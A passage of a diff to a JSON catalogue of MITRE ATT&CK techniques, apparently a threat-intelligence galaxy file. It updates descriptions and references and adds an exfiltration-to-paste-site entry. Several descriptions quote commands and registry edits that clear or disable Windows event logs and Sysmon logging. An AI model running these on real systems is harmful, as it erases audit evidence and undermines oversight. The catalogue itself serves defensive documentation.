"https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf",
- "https://attack.mitre.org/techniques/T1048/003"
+ "https://attack.mitre.org/techniques/T1048/003",
+ "https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/fundamentals/command/cf_command_ref/C_commands.html#wp1068167689"
]
},
"related": [
@@ -1535,7 +1533,6 @@
"refs": [
"http://pages.endgame.com/rs/627-YBU-612/images/EndgameJournal_The%20Masquerade%20Ball_Pages_R2.pdf",
"https://attack.mitre.org/techniques/T1036/005",
- "https://capec.mitre.org/data/definitions/177.html",
"https://docs.docker.com/engine/reference/commandline/images/",
"https://twitter.com/ItsReallyNick/status/1055321652777619457"
]
@@ -1550,7 +1547,7 @@
"value": "Match Legitimate Name or Location - T1036.005"
},
{
- "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. ",
+ "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.\n\nModifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. For example, adversaries may add a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port (i.e. [Non-Standard Port](https://attack.mitre.org/techniques/T1571)).(Citation: change_rdp_port_conti)",
"meta": {
"external_id": "T1562.004",
"kill_chain": [
@@ -1568,7 +1565,8 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1562/004"
+ "https://attack.mitre.org/techniques/T1562/004",
+ "https://twitter.com/TheDFIRReport/status/1498657772254240768"
]
},
"related": [
@@ -1581,7 +1579,7 @@
"value": "Disable or Modify System Firewall - T1562.004"
},
{
- "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
+ "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). \n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity, or remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Expel IO Evil in AWS)(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)\n\nModifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.",
"meta": {
"external_id": "T1562.007",
"kill_chain": [
@@ -1596,7 +1594,8 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/007",
- "https://expel.io/blog/finding-evil-in-aws/"
+ "https://expel.io/blog/finding-evil-in-aws/",
+ "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
]
},
"related": [
@@ -1683,6 +1682,36 @@
"uuid": "910906dd-8c0a-475a-9cc1-5e029e2fad58",
"value": "Windows Management Instrumentation Event Subscription - T1546.003"
},
+ {
+ "description": "Adversaries may exfiltrate data to text storage sites instead of their primary command and control channel. Text storage sites, such as pastebin[.]com, are commonly used by developers to share code and other information. \n\nText storage sites are often used to host malicious code for C2 communication (e.g., [Stage Capabilities](https://attack.mitre.org/techniques/T1608)), but adversaries may also use these sites to exfiltrate collected data. Furthermore, paid features and encryption options may allow adversaries to conceal and store data more securely.(Citation: Pastebin EchoSec)\n\n**Note:** This is distinct from [Exfiltration to Code Repository](https://attack.mitre.org/techniques/T1567/001), which highlight access to code repositories via APIs.",
+ "meta": {
+ "external_id": "T1567.003",
+ "kill_chain": [
+ "mitre-attack:exfiltration"
+ ],
+ "mitre_data_sources": [
+ "Network Traffic: Network Traffic Content",
+ "Network Traffic: Network Traffic Flow"
+ ],
+ "mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "refs": [
+ "https://attack.mitre.org/techniques/T1567/003",
+ "https://web.archive.org/web/20201107203304/https://www.echosec.net/blog/what-is-pastebin-and-why-do-hackers-love-it"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "40597f16-0963-4249-bf4c-ac93b7fb9807",
+ "type": "subtechnique-of"
+ }
+ ],
+ "uuid": "ba04e672-da86-4e69-aa15-0eca5db25f43",
+ "value": "Exfiltration to Text Storage Sites - T1567.003"
+ },
{
"description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.",
"meta": {
@@ -1736,7 +1765,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/009",
- "https://capec.mitre.org/data/definitions/38.html",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree",
"https://isc.sans.edu/diary/Help+eliminate+unquoted+path+vulnerabilities/14464",
"https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/",
@@ -2128,8 +2156,7 @@
"Linux"
],
"refs": [
- "https://attack.mitre.org/techniques/T1037",
- "https://capec.mitre.org/data/definitions/564.html"
+ "https://attack.mitre.org/techniques/T1037"
]
},
"uuid": "03259939-0b57-482f-8eb5-87c0e0d54334",
@@ -2155,8 +2182,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1039",
- "https://capec.mitre.org/data/definitions/639.html"
+ "https://attack.mitre.org/techniques/T1039"
]
},
"uuid": "ae676644-d2d2-41b7-af7e-9bed1b55898c",
@@ -2925,7 +2951,6 @@
"http://msdn.microsoft.com/en-us/library/aa376977",
"https://attack.mitre.org/techniques/T1547",
"https://blog.cylance.com/windows-registry-persistence-part-2-the-run-keys-and-search-order",
- "https://capec.mitre.org/data/definitions/564.html",
"https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx",
"https://msdn.microsoft.com/library/windows/desktop/ms725475.aspx",
"https://technet.microsoft.com/en-us/sysinternals/bb963902",
@@ -2966,7 +2991,7 @@
"value": "Remotely Track Device Without Authorization - T1468"
},
{
- "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)",
+ "description": "Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)\n\nAuthentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)\n\nAbusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts.\n\nAdversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned)",
"meta": {
"external_id": "T1649",
"kill_chain": [
@@ -2994,7 +3019,8 @@
"https://github.com/TheWover/CertStealer",
"https://o365blog.com/post/deviceidentity/",
"https://posts.specterops.io/certified-pre-owned-d95910965cd2",
- "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf"
+ "https://web.archive.org/web/20220818094600/https://specterops.io/assets/resources/Certified_Pre-Owned.pdf",
+ "https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming"
]
},
"uuid": "7de1f7ac-5d0c-4c9c-8873-627202205331",
@@ -3078,7 +3104,6 @@
"https://attack.mitre.org/techniques/T1558",
"https://blog.stealthbits.com/detect-pass-the-ticket-attacks",
"https://blogs.technet.microsoft.com/motiba/2018/02/23/detecting-kerberoasting-activity-using-azure-security-center/",
- "https://capec.mitre.org/data/definitions/652.html",
"https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf",
"https://docs.microsoft.com/windows-server/administration/windows-commands/klist",
"https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285",
@@ -3185,7 +3210,7 @@
"value": "OS-vendor provided communication channels - T1390"
},
{
- "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)",
+ "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)",
"meta": {
"external_id": "T1621",
"kill_chain": [
@@ -3248,7 +3273,7 @@
"value": "Rogue Wi-Fi Access Points - T1465"
},
{
- "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nThe event logs can be cleared with the following utility commands:\n\n* wevtutil cl system\n* wevtutil cl application\n* wevtutil cl security\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command Remove-EventLog -LogName Security to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)",
"meta": {
"external_id": "T1070.001",
"kill_chain": [
@@ -3266,7 +3291,8 @@
"https://attack.mitre.org/techniques/T1070/001",
"https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog",
"https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil",
- "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx"
+ "https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx",
+ "https://ptylu.github.io/content/report/report.html?report=25"
]
},
"related": [
@@ -3570,7 +3596,7 @@
"value": "Extra Window Memory Injection - T1055.011"
},
{
- "description": "Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).",
+ "description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as CreateProcessWithTokenW and runas.(Citation: Microsoft RunAs)\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.",
"meta": {
"external_id": "T1134.002",
"kill_chain": [
@@ -3649,7 +3675,7 @@
"value": "System Runtime API Hijacking - T1625.001"
},
{
- "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)\n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
+ "description": "Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)\n\nAdversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) \n\nAdversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Microsoft-Windows-Sysmon-Operational may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging) \n\nIn cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.\n\nFurthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)\n\nAdditionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)",
"meta": {
"external_id": "T1562.001",
"kill_chain": [
@@ -3673,9 +3699,9 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/001",
- "https://capec.mitre.org/data/definitions/578.html",
"https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf",
"https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947",
"https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html",
"https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/",
@@ -3724,7 +3750,7 @@
"value": "Compromise Software Supply Chain - T1195.002"
},
{
- "description": "Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session's access token and the adversary can use SetThreadToken to assign the token to a thread.",
+ "description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.",
"meta": {
"external_id": "T1134.003",
"kill_chain": [
@@ -3799,7 +3825,6 @@
"refs": [
"http://msdn.microsoft.com/en-us/library/bb166549.aspx",
"https://attack.mitre.org/techniques/T1546/001",
- "https://capec.mitre.org/data/definitions/556.html",
"https://docs.microsoft.com/windows-server/administration/windows-commands/assoc",
"https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs",
"https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd"
@@ -3867,7 +3892,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/001",
- "https://capec.mitre.org/data/definitions/471.html",
"https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637",
"https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN",
"https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN",
@@ -3906,8 +3930,7 @@
"Windows"
],
"refs": [
- "https://attack.mitre.org/techniques/T1574/010",
- "https://capec.mitre.org/data/definitions/17.html"
+ "https://attack.mitre.org/techniques/T1574/010"
]
},
"related": [
@@ -3979,7 +4002,7 @@
"value": "Network Address Translation Traversal - T1599.001"
},
{
- "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the EventLog service may be disabled using the following PowerShell line: Stop-Service -Name EventLog.(Citation: Disable_Win_Event_Logging) Additionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
+ "description": "Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\n\nThe EventLog service maintains event logs from various system components and applications.(Citation: EventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security Settings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit Policy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation: Advanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the “Start” value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging)\n\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. For example, auditpol /set /category:”Account Logon” /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\n\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.",
"meta": {
"external_id": "T1562.002",
"kill_chain": [
@@ -4003,8 +4026,10 @@
"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/advanced-security-audit-policy-settings",
"https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/audit-policy",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md",
+ "https://ptylu.github.io/content/report/report.html?report=25",
"https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html",
"https://svch0st.medium.com/event-log-tampering-part-1-disrupting-the-eventlog-service-8d4b7d67335c",
+ "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040",
"https://www.coretechnologies.com/blog/windows-services/eventlog/",
"https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/",
"https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/"
@@ -4038,7 +4063,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1562/003",
- "https://capec.mitre.org/data/definitions/13.html",
"https://community.sophos.com/products/intercept/early-access-program/f/live-discover-response-queries/121529/live-discover---powershell-command-audit",
"https://community.sophos.com/products/malware/b/blog/posts/powershell-command-history-forensics",
"https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_history?view=powershell-7"
@@ -4565,7 +4589,6 @@
],
"refs": [
"https://attack.mitre.org/techniques/T1574/011",
- "https://capec.mitre.org/data/definitions/478.html",
"https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
"https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree",
"https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry-key-security-and-access-rights?redirectedfrom=MSDN",
@@ -4619,7 +4642,7 @@
"value": "Component Object Model Hijacking - T1546.015"
},
{
